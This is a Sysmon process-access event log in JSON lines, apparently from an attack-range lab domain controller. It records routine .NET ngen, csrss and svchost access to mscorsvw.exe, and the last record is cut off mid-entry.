{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7405,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.335\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-001008780D00}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.335","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-001008780D00}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7406,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.335\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-001008780D00}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.335","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-001008780D00}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7407,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.335\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-001008780D00}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.335","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-001008780D00}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7408,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.366\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-00108C7B0D00}\r\nTargetProcessId: 5024\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.366","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-00108C7B0D00}","TargetProcessId":"5024","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7409,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.366\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-00108C7B0D00}\r\nTargetProcessId: 5024\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.366","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-00108C7B0D00}","TargetProcessId":"5024","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7410,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-00108C7B0D00}\r\nTargetProcessId: 5024\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-00108C7B0D00}","TargetProcessId":"5024","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7411,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.398\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-001030580C00}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.398","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-001030580C00}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7412,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.398\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-001030580C00}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: 